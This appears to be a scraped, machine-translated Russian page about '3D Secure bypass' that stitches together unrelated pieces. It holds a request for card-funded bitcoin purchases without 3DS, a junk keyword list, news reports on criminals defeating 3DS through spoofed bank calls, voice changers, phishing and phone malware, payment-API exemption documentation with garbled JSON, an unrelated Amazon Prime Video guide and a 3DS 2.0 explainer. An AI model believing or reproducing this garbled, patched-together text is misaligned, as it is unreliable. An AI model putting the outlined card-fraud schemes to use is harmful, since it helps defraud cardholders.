привет, я хотел бы купить биткойны с помощью дебетовой / кредитной карты, но я потерял свой телефон, веб-сайт, который я использую, запрашивает код безопасности 3d, а не то, что я потерял свой телефон, я предпочитаю найти другой веб-сайт, чтобы купить биткойны без 3d вариант, если вы знаете какой-либо, поделитесь им с нами.7. Braintree — это сервис PayPal. 0 0 Время чтения: 2 минуты 29 секунд. … Исследователи в области безопасности из компании Gemini Advisory по анализу угроз говорят, что они наблюдали действия в темной сети, связанные с обходом 3D Secure (3DS), который предназначен для повышения безопасности онлайн-транзакций по кредитным и дебетовым картам.

Тейпирование при тендините передней большеберцовой мышцы,
Питьевая кровь свиней Значение,
Волейбол в помещении Wilson Impact,
Целевая скоба для лодыжки,
Расшифруй Руйнлао,
Лос-Мариачи Питтсбург,
Ключевые принципы работы нескольких агентств,
Кемпинг Hickory Hammock,

Хакеры знают, как обойти 3D Secure

3D Secure обеспечивает второй уровень безопасности для банковских карт пользователей, постоянно находится в центре внимания киберпреступников, которые ищут способы обойти его.

Именно поэтому на одном из форумов даркнета злоумышленники поделились передовым опытом, допускающим несанкционированную покупку товаров в интернет-магазинах за счет держателей карт.

Даже вашу подарочную карту можно отследить. Прочтите эту статью и примите необходимые меры, чтобы обезопасить себя.

Что такое 3D Secure?

3D Secure — это двухфакторная аутентификация держателя карты при совершении платежа. Проще говоря, это подтверждение того, что на самом деле платеж совершает владелец карты, вводя пароль, отправленный по SMS на номер телефона держателя карты.

Технология используется для подтверждения личности клиента. Он основан на протоколе XML (протокол расширяемого языка разметки). Название 3D Secure обозначает три домена, которые участвуют в обработке данных.

Изначально технология входила в пакет Verified by VISA и была доступна только держателям карт VISA. Сейчас аутентификация 3DS широко используется платежными системами разных стран. Давайте подробнее рассмотрим, что это такое.

Избегайте обмана потребителей на национальном уровне, следуя основным методам, перечисленным в этой статье .

3DS добавляет дополнительный уровень защиты при покупках в интернет-магазинах. Благодаря протоколу покупатель должен подтвердить, что действительно является владельцем банковской карты, с которой списываются деньги.

Вторая версия протокола (3DS 2.0) разработана специально для смартфонов. Он позволяет подтверждать покупки с помощью банковских приложений, установленных на мобильном устройстве. В этом случае пользователь может использовать биометрическую аутентификацию: сканирование отпечатка пальца или лица.

Интернет-воры ушли в оффлайн и научились ограбить ваш дом с помощью смартфона .

Что не так с 3D-безопасностью?

Однако первая версия 3DS все еще используется во многих магазинах, что открывает возможности для обмана держателя карты с помощью социальной инженерии. В этом случае основная задача злоумышленников — заставить пользователя ввести шорткод или пароль для подтверждения незаконной транзакции, совершенной злоумышленниками.

Как отмечают на форуме киберпреступники, успешное использование комбинации социальной инженерии и фишинговых атак может позволить обойти 3D Secure и купить любой продукт за счет ничего не подозревающего гражданина.

Кража банковских данных может быть одной из причин социальной инженерии .

Охранная компания Gemini Advisory опубликовала пост, в котором предупреждает пользователей о существующих методах обхода протокола 3D Secure.При этом эксперты подчеркивают, что киберпреступники активно обсуждают эти методы, что приводит к всплеску подобных атак.

Для реализации описанных методов злоумышленнику сначала необходимо получить хотя бы минимальный объем информации о держателе карты: его имя, номер телефона, адрес электронной почты, адрес проживания и, возможно, номер водительских прав.

Почему это опасно?

После получения необходимых данных преступник может использовать их в разговоре с пользователем под видом сотрудника банка.Как правило, доверчивые пользователи попадают на такие уловки из-за того, что мошенник выдает верную информацию. Один из посетителей форума дарквеб описал именно такую ​​схему:

Используя данные пользователя, программное обеспечение для изменения голоса и приложение для подделки телефонного номера, купленное в интернет-магазине, киберпреступник может позвонить держателю карты и узнать всю информацию, необходимую для подтверждения транзакции.

Киберпреступники также описали другие способы, такие как заманивание пользователя на фишинговый сайт, установка вредоносного ПО на его мобильное устройство и т. Д.В общем, с банковскими картами нужно быть осторожнее.

Не забудьте обновить свою память последними новостями в мире кибербезопасности.

Исключений SCA | Портал разработчиков Elavon

На этой странице:

Обзор

Во время аутентификации 3D Secure может иметь место строгая аутентификация клиента (SCA) или проблема аутентификации без проблем.Если вы имеете право обойти проверку подлинности 3D-Secure, вы можете использовать исключения SCA.

Право на участие

Если вы хотите быть освобожденным от проверки подлинности 3D Secure, вам следует проконсультироваться со своим эквайером. Они лучше всего посоветуют, какое освобождение подходит для нужд вашего бизнеса.

Мы рекомендуем оставить обработку освобождения эмитенту карты и всегда отправлять запрос аутентификации 3D Secure как, с исключением:

• Ответственность за возвратные платежи автоматически перекладывается на вас (продавца)
• Существует повышенная вероятность того, что транзакции будут отклонены, если эмитент карты не согласен с освобождением.

Мягкое отклонение

Если вы указываете причину освобождения SCA, и эмитент карты с ней не согласен, он может вернуть ответ «мягкий отказ» ( bankResponseCode: 65 или bankResponseCode: 1A ). В этом случае Opayo автоматически будет:

• Отправьте от вашего имени аутентификацию 3D Secure и новый запрос авторизации.
• Если эмитент карты снова ответит сообщением «мягкий отказ», оно будет возвращено вам в ответ на ваш запрос транзакции.
• Затем вы должны отправить новый запрос транзакции с аутентификацией 3D Secure и попросить держателя карты выполнить SCA.

По этой причине поля исключения SCA находятся в объекте strongCustomerAuthentication , поскольку вы должны предоставить данные аутентификации 3D Secure в запросе транзакции с исключением SCA.

Подробнее о 3D Secure Authentication.

Типы освобождений

Вы можете запросить использование следующих исключений SCA:

Два других исключения применяются только к последующим транзакциям.Дополнительные сведения см. В разделе «Учетные данные в файле»:

• Сделки, инициированные продавцом (MIT)
• Регулярные платежи (см. Раздел «Учетные данные в файле»).

Транзакции с низкой стоимостью (LVT)

Когда владелец карты использует свои льготы LVT на сайтах других продавцов, вы не можете точно применить это освобождение. Только эмитент карты будет знать, были ли достигнуты счетчики освобождения LVT. Правила включают:

• Сумма сделки должна быть не более 30 евро.
• Освобождение разрешено максимум для 5 последовательных LVT или максимальной совокупной суммы LVT в размере 100 EUR.
• На шестой LVT или когда совокупная сумма LVT превышает 100 EUR, необходимо выполнить аутентификацию 3D-Secure.

Надежный анализ рисков (TRA)

Освобождение от

TRA для определенных сумм разрешено, когда уровень мошенничества для вас или вашего эквайера находится в пределах пороговых значений. Уровень освобождения от TRA, который может предоставить ваш эквайер, будет сначала зависеть от общего уровня мошенничества вашего эквайера, а затем и от вашего.

В следующей таблице перечислены 3 уровня освобождения от уплаты налогов. Максимальная сумма исключения составляет 500 евро для очень низкого уровня мошенничества.

Примечание: Обычно 1 бит / с = 1 возвратный платеж из 10 000 транзакций.

Надежный получатель

Вы можете использовать исключение для доверенных получателей, если владелец карты добавит вас в список доверенных получателей. Они могут сделать это по запросу эмитента карты при входе в свой банковский счет или в процессе проверки подлинности.

Безопасный корпоративный платеж

Secure корпоративные карты и номера виртуальных карт освобождаются от аутентификации 3D-Secure. Эти платежи обычно представляют собой платежи между предприятиями (B2B), в которых используются специальные корпоративные процессы и протоколы.

Примечание: Это освобождение не распространяется на личные корпоративные карты.

Делегированная аутентификация

Исключение делегированной аутентификации предотвращает аутентификацию 3D-Secure, когда вы уже выполнили аутентификацию.

Чтобы пройти квалификацию, вы должны быть аккредитованы в схемах карт для выполнения аутентификации 3D-Secure: схемы карт делегируют аутентификацию 3D-Secure вам, и вы можете выполнять аутентификацию 3D Secure независимо от них.

Шаги по использованию льгот

Шаг 1. Поговорите со своим эквайером

Проконсультируйтесь со своим эквайером, чтобы понять, какое из исключений SCA вам разрешено использовать. Использование неправильного исключения приведет к отклонению вашего запроса на транзакцию.

Шаг 2. Отправьте запрос на транзакцию с исключением SCA

В запросе транзакции укажите следующие ключевые поля:

1. apply3DSecure: отключите , чтобы указать, что вы хотите обойти 3D Secure.
2. Укажите поле threeDSExemptionIndicator и значение, найденное в объекте strongCustomerAuthentication, чтобы указать причину обхода 3D Secure.

Окружающая среда

Пример запроса на освобождение от SCA для освобождения от TRA

    "PurchaseInstalData": "002",
    "threeDSRequestorAuthenticationInfo": {
      "threeDSReqAuthData": "данные",
      "threeDSReqAuthMethod": "LoginWithThreeDSRequestorCredentials",
      "threeDSReqAuthTimestamp": "201810011445"
    },
    "threeDSRequestorPriorAuthenticationInfo": {
      "threeDSReqPriorAuthData": "данные",
      "threeDSReqPriorAuthMethod": "FrictionlessAuthentication",
      "threeDSReqPriorAuthTimestamp": "2011645",
      "threeDSReqPriorRef": "2cd842f5-da5d-40b7-8ae6-6ce61cc7b580"
    },
    "acctInfo": {
      "chAccAgeInd": "MoreThanSixtyDays",
      "chAccChange": "20180925",
      "chAccChangeInd": "MoreThanSixtyDays",
      "chAccDate": "20180925",
      «chAccPwChange»: «20180925»,
      "chAccPwChangeInd": "MoreThanSixtyDays",
      "nbPurchaseAccount": "5",
      "ProvisionAttemptsDay": "123",
      «txnActivityDay»: «2»,
      "txnActivityYear": "123",
      "paymentAccAge": "20180925",
      "paymentAccInd": "MoreThanSixtyDays",
      "shipAddressUsage": "201
",
      "shipAddressUsageInd": "MoreThanSixtyDays",
      "shipNameIndicator": "FullMatch",
      "suspiciousAccActivity": "NotSuspicious"
    },
    "merchantRiskIndicator": {
      "deliveryEmailAddress": "действительный @ адрес электронной почты.com ",
      "deliveryTimeframe": "OvernightShipping",
      "giftCardAmount": "12345678
45",
      "giftCardCount": "1",
      "giftCardCurr": "GBP",
      "preOrderDate": "20180925",
      "preOrderPurchaseInd": "MerchandiseAvailable",
      "reorderItemsInd": "Переупорядочено",
      "shipIndicator": "CardholderBillingAddress",
      "threeDSExemptionIndicator": "TransactionRiskAnalysis"
    }
  }
} 

Пример ответов

Пример ответа при успешной авторизации

{
  "transactionId": "DB79BA2D-05DA-5B85-D188-1293D16BBAC7",
  "transactionType": "Платеж",
  "status": "Хорошо",
  "statusCode": 0,
  "statusDetail": "Авторизация прошла успешно.",
  "retrievalReference": 9493946,
  "bankResponseCode": 0,
  "bankAuthorisationCode": 999777,
  "avsCvsCheck": {
    "status": "Все соответствует",
    "address": "Соответствует",
    "postalCode": "Соответствует",
    "securityCode": "Соответствует"
  },
  "способ оплаты":{
    "карта":{
      "merchantSessionKey": "90BDF208-3C19-40AC-858B-3F4054DCD1C0",
      "cardIdentifier": "cardTokenUUID",
      "многоразовый": ложь
    }
  },
  «количество»: 41000,
  «валюта»: «фунты стерлингов»
}
 

Пример ответа, в котором авторизация была «мягко отклонена»

Если вы указываете причину исключения SCA, и эмитент карты с ней не согласен, он может вернуть ответ «мягкий отказ» (bankResponseCode: 65 или bankResponseCode: 1A).В этом случае Opayo автоматически будет:

• Отправьте от вашего имени аутентификацию 3D Secure и новый запрос авторизации.
• Если эмитент карты снова ответит сообщением «мягкий отказ», оно будет возвращено вам в ответ на ваш запрос транзакции (аналогично следующему примеру).
• Затем вы должны отправить новый запрос транзакции с аутентификацией 3D Secure и попросить держателя карты выполнить SCA, включив apply3DSecure: Force и удалив поле threeDSExemptionIndicator a.

Примечание: Значение для bankResponseCode также может быть 1А, возможно, некоторые эквайеры могут вернуть здесь другое значение.

{
  "transactionId": "DB79BA2D-05DA-5B85-D188-1293D16BBAC7",
  "transactionType": "Платеж",
  "status": "NotAuthed",
  "statusCode": 2022,
  "statusDetail": "Банк отклонил авторизацию. Требуется SCA.",
  "retrievalReference": 9493946,
  "bankResponseCode": 65,
  "avsCvsCheck": {
    "status": "NotChecked",
    "адрес": "NotChecked",
    "postalCode": "NotChecked",
    "securityCode": "NotChecked"
  },
  "способ оплаты":{
    "карта":{
      "merchantSessionKey": "90BDF208-3C19-40AC-858B-3F4054DCD1C0",
      "cardIdentifier": "cardTokenUUID",
      "многоразовый": ложь
    }
  },
  «количество»: 41000,
  «валюта»: «фунты стерлингов»
} 

❮ Назад к управлению правилами аутентификации 3D Secure Далее: токены (многоразовые идентификаторы) ❯

Как обойти данные входа в систему, учетную запись 3D Secure | Loginask

Пошаговое руководство по входу в приложение Amazon Prime с вашего Smart TV

На подходящем смарт-телевизоре и устройстве для потоковой передачи мультимедиа, игровой консоли, мобильном телефоне или планшете смотрите неограниченное количество фильмов и сериалов из приложения Amazon Prime Video.Сервис видео по запросу Amazon Amazon Video — крупнейший глобальный конкурент Netflix. Как и Netflix, Amazon Video обеспечивает немедленный доступ к сериалам и фильмам на любом устройстве, подключенном к Интернету.
Однако Amazon тратит много денег на оригинальные телешоу и спортивные состязания, которые доступны только на сайте. Так что вам понадобится членство, чтобы смотреть их. В этой статье есть все, что вам нужно знать, если вы хотите посмотреть их или какой-либо из сотен других доступных шоу или фильмов, в том числе о том, как получить к ним доступ на своем телевизоре.Войдите в Amazon Prime Video со своего Smart TV:
Приложения для Amazon Video доступны на множестве Smart TV от разных производителей. К ним относятся, помимо прочего, телевизоры LG, Panasonic, Samsung и Sony. Все, что вам нужно сделать, это загрузить приложение на свой телевизор, запустить его и войти в систему со своими учетными данными Amazon.
Шаг 1. Убедитесь, что ваше устройство совместимо:
Несмотря на то, что Amazon Prime Video имеет отличную совместимость с устройствами, всегда рекомендуется перепроверить перед регистрацией, чтобы убедиться, что вы сможете смотреть видео на своем любимом устройстве.Все устройства, работающие с Prime Video, перечислены ниже:
Fire TV
Телевизор Samsung
Sony TV
Телевизор LG
Apple TV
Шаг 2. Перейдите на сайт Amazon Prime Video:
Перейдите на главный сайт Amazon Prime Video. При членстве в Amazon Prime Prime Video доступен бесплатно. Нажмите на Prime Member? Если вы уже подписались на него. Зарегистрируйте учетную запись Amazon и начните оттуда. В противном случае выберите «Начать бесплатную 30-дневную пробную версию».
Шаг 3. Зарегистрируйте учетную запись Prime Video
Вам будет предложено войти в свою учетную запись Amazon, указав свой адрес электронной почты и пароль, на следующем экране.Если у вас уже есть учетная запись, войдите в систему, введите свои данные и следуйте инструкциям на экране, чтобы начать бесплатную пробную версию. Если вы новичок в Amazon. Создайте учетную запись Amazon; для этого выберите параметр «Создать учетную запись Amazon». Затем укажите свое имя и адрес электронной почты, а также пароль для доступа к вашей учетной записи.
Продолжайте, нажимая клавишу Enter. После этого заполните свою платежную информацию. Amazon принимает все основные кредитные и дебетовые карты. Не волнуйтесь, и с вас не будет снята оплата до окончания месячного бесплатного пробного периода? После этого Amazon Prime стоит 6 долларов.99 каждый месяц. Вы также получите доступ к Prime Reading и Twitch, а также к другим удивительным преимуществам Prime, таким как ускоренная доставка покупок, соответствующих критериям Prime, бесплатная международная доставка и многое другое.
Наконец, на экране подтверждения проверьте информацию о своей учетной записи, информацию о платеже и выбор плана. Чтобы завершить процесс регистрации, нажмите «Подтвердить». Вот и все.
Шаг 4. Добавьте Amazon Prime Video в свою учетную запись Smart TV:
Найдите время, чтобы настроить Prime Video на своем Smart TV, чтобы получить от него максимум удовольствия.Вот как это сделать:
Fire TV
Зарегистрируйте Fire TV Stick Basic Edition, указав данные учетной записи, связанные с подпиской Prime, для просмотра Prime Video. Чтобы изменить настройки регистрации Fire TV, перейдите в «Моя учетная запись» и выберите «Настройки» в меню Fire TV. На этой странице, если ваше устройство не зарегистрировано, отображается параметр «Регистрация». Выберите «Зарегистрироваться» и войдите в систему, используя свои учетные данные Amazon. Затем на главном экране откройте приложение Prime Video.
Телевизор Samsung
Загрузите приложение Prime Video через Samsung Smart Hub на некоторых телевизорах Samsung:
Нажмите кнопку Smart Hub на пульте телевизора и выберите в меню Samsung Apps.Выберите Prime Video из списка:
Войдите в систему после загрузки приложения, чтобы подключить свою учетную запись к приложению.
● телевизор Sony
Загрузите приложение Prime Video из панели контента телевизора Sony на некоторых телевизорах Sony. Сначала нажмите кнопку «Домой» на пульте дистанционного управления телевизора, затем перейдите в раздел «Избранные приложения» и выберите «Prime Video». Затем попробуйте поискать в разделе «Все приложения», если приложения там нет. После этого выберите «Войти» и начните просмотр.
● LG TV
Загрузите приложение Prime Video из магазина содержимого LG на некоторые телевизоры LG. Выберите Prime Video на панели запуска приложений, нажав кнопку «Мои приложения» на пульте дистанционного управления телевизора.После загрузки приложения войдите в систему, используя свои учетные данные.
● Apple TV
Загрузите приложение Prime Video для Apple TV в App Store. Сначала перейдите в App Store, найдите Prime Video и нажмите «Получить» на главном экране. Затем на главном экране выберите Prime Video, чтобы открыть приложение и войти в систему.
Шаг 5: перейдите в Amazon Prime Video и начните смотреть:
Prime Video предлагает живое сочетание телесериалов и фильмов с оригинальными произведениями, такими как «Чудесная миссис Мейзел» и «Джек Райан», которые стоит выпить.Вы также можете загружать названия для просмотра в автономном режиме на платформе, чтобы вы могли смотреть сериалы и фильмы на своем мобильном устройстве в дороге.

Читать далее

киберпреступников находят способы обойти 3D Secure — E Hacking News

Исследователи безопасности из компании Gemini Advisory по анализу угроз говорят, что они заметили упражнения в темной сети, связанные с обходом 3D Secure (3DS), который предназначен для повышения безопасности в Интернете. операции с кредитными и дебетовыми картами. Разработанная как дополнительный уровень защиты для этих транзакций, 3DS увидела несколько выпусков, включая последнюю, а именно версию 2.0, также предназначенный для мобильных телефонов, позволяющий аутентифицировать его по отпечатку пальца или распознаванию лица.

В дополнение к различным стратегиям социальной инженерии, которые злоумышленники могут использовать для обхода 3DS, фишинговые и мошеннические страницы позволяют им обманом заставить жертв раскрыть данные своей карты и информацию для подтверждения платежа. Исследователи безопасности Gemini говорят, что уязвимости в предыдущих версиях 3DS могли быть использованы для обхода безопасности. Одной из таких проблем было использование пароля для транзакции, поскольку иногда это был персональный идентификационный номер (PIN), который киберпреступники могли получить с помощью различных методов.

Используя различные методы социальной инженерии, например, выдавая себя за представителей банка, киберпреступники могут собирать от жертв большой объем данных, включая имя, идентификационный номер, номер телефона, физический адрес и адрес электронной почты, девичью фамилию матери, номера водительских прав и т. Д. . Вооружившись некоторой информацией, позволяющей установить личность (PII), злоумышленник может обманом заставить жертву поделиться дополнительной информацией.

Один из способов, предложенный некоторыми киберпреступниками для обхода 3DS, включает в себя вызов жертве с телефонного номера, который подделывает номер на обратной стороне платежной карты, и обманом заставляет ее проверить транзакцию, которую в настоящее время совершает мошенник, утверждая, что она необходима для в целях проверки личности.Использование фишинговых сайтов, которые копируют реальные интернет-магазины, также может позволить хакерам собирать данные карт жертв и обманным путем заставить их одобрить платеж с использованием 3DS. Иногда злоумышленники могут использовать вредоносное ПО для нацеливания на мобильные телефоны клиентов и восстановления проверочных кодов 3DS.

«Старые версии 3DS, такие как версия 1.0 (которая до сих пор широко используется во всем мире), уязвимы для хакеров, которые находят способы обойти свои функции безопасности. Gemini Advisory с умеренной уверенностью оценивает, что киберпреступники, вероятно, будут продолжать полагаться на социальную инженерию и фишинг, чтобы обойти меры безопасности 3DS », — заключает Gemini.

Аутентификация без трения с 3D Secure 2

Протокол 3D Secure уже 16 лет дает клиентам уверенность, обеспечивая дополнительный уровень безопасности при онлайн-транзакциях без предъявления карты.

Он также защищает продавцов от мошеннических возвратных платежей, проверяя личность держателя карты в точке платежа через банк-эмитент.

Несмотря на преимущества защиты как продавцов, так и клиентов, этот процесс привел к возникновению отношений любви / ненависти между протоколом 3DS и пользователями.

Это почти то же самое, что принимать лекарство: вы знаете, что оно для вашего же блага и защитит вас от угрозы болезней, но это больно не забывать принимать его и может оставить неприятный привкус во рту.

Болевые точки исходного протокола

Хотя угроза преступлений и мошенничества посредством онлайн-платежей широко признана, правда в том, что большинству онлайн-покупателей не приходилось сталкиваться с ней напрямую.

Таким образом, когда они сталкиваются с этапами аутентификации на этапе оформления заказа, они либо считают, что это не нужно, и видят в этом не более чем раздражение, либо наоборот; они могут быть незнакомы с процессом и фактически рассматривать его как угрозу безопасности, когда их просят предоставить дополнительную информацию.

Оба обстоятельства отрицательно влияют на качество обслуживания клиентов и могут заставить клиента отказаться от транзакции. Это оказывает прямое влияние на коэффициент конверсии, и, как следствие, продавцы могут быть не столь заинтересованы в принятии протокола в первую очередь.

Проблема в том, что онлайн-мошенничество никуда не денется. На самом деле ситуация ухудшается, поскольку мошенники ищут более изощренные способы взлома наших онлайн-платежей.

Таким образом, безопасность, которую обеспечивает 3D Secure, с течением времени становится все более актуальной.

Решение — 3D Secure 2.0

EMVCo решает эти проблемы с помощью спецификации 3D Secure 2.0.

Это включает полную мобильную интеграцию с разработкой SDK, что позволяет продавцам легко интегрировать процесс аутентификации 3D Secure в свои мобильные приложения.

Это значительно улучшило работу 3DS на мобильных устройствах и позволило продавцам защитить своих клиентов от мошенничества на более широком спектре платформ.

3DS 2.0 также обеспечивает аутентификацию без оплаты, например, когда пользователи вводят данные своей карты в мобильный кошелек.

Сильный акцент на SCA , такой как двухфакторная аутентификация (например, одноразовые пароли и биометрическая аутентификация), также означает, что протокол соответствует таким правилам, как PSD2 , что упрощает выполнение требований финансовыми учреждениями, внедряющими 3DS 2.0.

Самое главное, что 3DS 2.0 значительно улучшает качество обслуживания клиентов, внедряя Frictionless Flow через аутентификацию на основе рисков.

Что такое аутентификация

на основе рисков?

Аутентификация на основе рисков — это просто процесс определения риска, связанного с конкретной транзакцией, и, на основе уровня риска, следует ли предлагать пользователю дополнительные шаги аутентификации.

Поддерживая более широкий обмен данными и дополнительный обмен данными во время онлайн-транзакций, 3D Secure 2.0 расширяет возможности проверки подлинности на основе рисков для продавцов и эмитентов.

Дополнительные элементы данных во время транзакции могут использоваться как эмитентом, так и продавцом, чтобы принять более обоснованное решение о том, следует ли продолжать шаги аутентификации 3D Secure.

Транзакции проверяются на предмет элементов, которые помещают их в разные категории риска.

Эти элементы, основанные на оценке риска, включают:

• Стоимость транзакции
• Новый или существующий клиент
• История транзакций
• История поведения
• Информация об устройстве

Итак, если продавец обнаруживает, что новая карта используется на система пользователем без истории транзакций, риск, вероятно, будет сочтен высоким, если потребуется процесс аутентификации.

Однако, если у продавца уже есть карта в системе, и пользователь ранее совершал платежи через платформу, риск будет низким, и аутентификацию 3D Secure можно будет обойти для завершения транзакции.

Аналогичным образом, если у покупателя есть история покупок на платформе, но он, возможно, использует ее на новом устройстве, которое ранее не использовалось, продавец может решить потребовать аутентификацию через 3DS, поскольку теперь существует неизвестная переменная.

Как это продвигает

Frictionless Flow?

Благодаря аутентификации на основе рисков, выполняемой в ACS, беспрепятственный поток позволяет эмитентам утверждать транзакцию без необходимости взаимодействия с держателем карты.

Когда покупатель совершает онлайн-покупку, он добавляет товар в свою корзину, заполняет обычную информацию о покупке и затем приступает к подтверждению покупки.

Подробная информация о покупке, включая данные устройства, приобретенный предмет и стоимость, отправляется на сервер ACS для определения подлинности держателя карты.

Затем ACS проверит его с элементами, основанными на оценке риска. Если риск считается низким, ACS может пассивно аутентифицировать клиента и не беспокоить его дополнительным подтверждением.

Это простой процесс для клиента, поскольку он происходит за кулисами. Они попадают прямо на экран подтверждения покупки, даже не зная, что их транзакция была проверена.

Платформа продавца потребует дополнительной аутентификации только в том случае, если риск высок. План 3D Secure 2.0 за счет использования аутентификации, основанной на оценке риска, заключается в том, чтобы это происходило лишь в небольшом проценте транзакций.

Для клиентов преимущество заключается в том, что они знают, что их платежи защищены, и при этом могут наслаждаться простым и непрерывным покупательским опытом.

Преимущество для продавцов заключается в том, что они по-прежнему получают преимущества от внедрения протокола 3D Secure на своей платформе, такие как защита от мошеннических возвратных платежей, но в то же время они обеспечивают защиту своих клиентов от несанкционированных транзакций.

У покупателя более удобный опыт работы с платформой продавца, поскольку он не подвергается сомнению. Это означает, что процент отказов из-за протокола 3DS будет резко снижен, и покупатель с радостью вернется на платформу продавца.

Заключение

В целом вторая итерация протокола 3DS — большое улучшение для всех участников.

Он позволяет продавцам обеспечивать защиту на нескольких платформах с простой интеграцией в свои системы, включая мобильные приложения, при этом имея возможность использовать преимущества, предоставляемые протоколом. Также предполагается, что количество брошенных тележек резко упадет.

Эмитенты могут делиться и получать больше данных с продавцами, что дает им более полное представление о шаблонах транзакций, что позволяет им определять риск с большей точностью и, следовательно, улучшать процесс аутентификации.3DS 2.0 также предоставит банкам возможность легко выполнять требования PSD2.

Для клиентов обновления, пожалуй, самые выгодные. Теперь они могут пользоваться защитой от мошеннических транзакций на большинстве платформ.